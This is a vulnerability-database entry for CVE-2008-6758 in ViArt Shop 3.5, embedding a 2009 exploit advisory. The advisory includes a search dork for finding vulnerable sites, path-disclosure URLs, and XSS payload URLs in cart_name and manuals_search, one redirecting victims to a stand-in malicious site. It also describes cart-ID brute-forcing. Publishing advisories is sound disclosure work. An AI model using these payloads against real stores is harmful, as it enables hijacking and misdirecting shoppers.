ViArt Shop'cart_save.php'跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117184 漏洞类型 跨站请求伪造
发布时间 2009-01-01 更新时间 2009-04-28
CVE编号 CVE-2008-6758 CNNVD-ID CNNVD-200904-506
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7628
https://www.securityfocus.com/bid/80722
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-506
|漏洞详情
ViArtShop(又称ShoppingCart)3.5版本中的cart_save.php存在跨站请求伪造漏洞。远程攻击者可以借助保存操作中的cart_name参数,劫持对任意用户请求进行的身份认证。这些请求用于执行跨站脚本攻击。
|漏洞EXP
===============================================================
!vuln
ViArt Shopping Cart v3.5 is prone to multiple remote 
vulnerabilities. Earlier versions may also be affected.
===============================================================

===============================================================
!dork
Dork: intext:"Free Ecommerce Shopping Cart Software by ViArt" +"Your shopping cart is empty!" + "Products  Search" +"Advanced Search" + "All Categories"
===============================================================

===============================================================
!risk 1 - Full Path Disclosure
Low
Attackers can use this vulnerability to leverage another attack
after the full path has been disclosed.
===============================================================

===============================================================
!discussion 1 - Full Path Disclosure
The server will give an error when any URL real/imaginary is 
passed to the POST_DATA parameter:
http://www.victim.com/manuals_search.php?POST_DATA=http://site-that-does-not-exist.com

A remote user is able to identify the full path of the document
root folder.
===============================================================

===============================================================
!risk 2 - Information Disclosure
Medium
The table names can be further leveraged for a SQL injection if
one exists.
===============================================================

===============================================================
!discussion 2 - Information Disclosure
When a user is not signed in, the tables are shown to the 
attacker via an error, because the PHP form fails to properly
sanitize user_id since the user is not logged in.

The attacker must first try to add a product to the cart and 
then save the shopping cart for the tables to be revealed by 
browsing to: http://www.victim.com/cart_save.php
===============================================================

===============================================================
!risk 3 - Arbitrary Code Injection
High
Attackers can use this vulnerability to execute arbitrary code
on a legitimate user.
===============================================================

===============================================================
!discussion 3 - Arbitrary Code Injection
The attacker is able to create shopping carts with 
HTML/Javascript injected code such as:
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><a href="http://www.google.com">Google</a></html>
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>alert("VULN");</script></html>
http://www.victim.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>window.location="http://malicious-site.com";</script></html>

Then when the user visits "My Saved Carts" at 
http://victim.com/user_carts.php the code is executed:
Example 1 would give a link to the Google search engine.
Example 2 would give a javascript alert popup displaying "VULN".
Example 3 would send the user to a malicious site.

Note: manuals_search.php is also vulnerable to the same 
HTML/Javascript vulnerability that allows for arbitrary code to
be executed:
http://www.victim.com/manuals_search.php?manuals_search=<html><script>window.location="http://malicious-site.com";</script></html>

A remote user is able to identify the full path of the document
root folder.
===============================================================

===============================================================
!extras
The Cart name is all that needs to be guessed/brute-forced for 
an attacker to gain entry to the shopping cart. As the cart-id 
increments from 1 upwards. This does not require any user-login
from the attacker.

An attacker could also overload the server with a ton of 
shopping carts by constantly refreshing cart_save.php to create
multiple shopping cart ID's.
===============================================================

===============================================================
!solution
ViArt Shopping Cart can still be used, but be wary of the full 
path disclosure and make sure no SQL injections can take place
once an attacker knows the table names. Alert users that they 
should be wary of which links they click on as an attacker 
could redirect them to a malicious site. The overloading of 
cart_save.php can be solved by placing IP-bans on attackers.
There is no solution to the brute-force guessing of cart names.
The vendor has not yet been notified.
===============================================================

===============================================================
!greetz
Greetz go out to the people who know me.
===============================================================

===============================================================
!author
Xia Shing Zee
===============================================================

# milw0rm.com [2009-01-01]
|受影响的产品
ViArt ViArt Shop 3.5
|参考资料

来源:SECTRACK
名称:1021497
链接:http://www.securitytracker.com/id?1021497
来源:BID
名称:33043
链接:http://www.securityfocus.com/bid/33043
来源:BUGTRAQ
名称:20081229ViArtShoppingCartv3.5MultipleRemoteVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/499625/100/0/threaded
来源:SECUNIA
名称:33340
链接:http://secunia.com/advisories/33340
来源:OSVDB
名称:53283
链接:http://osvdb.org/53283
来源:OSVDB
名称:51029
链接:http://osvdb.org/51029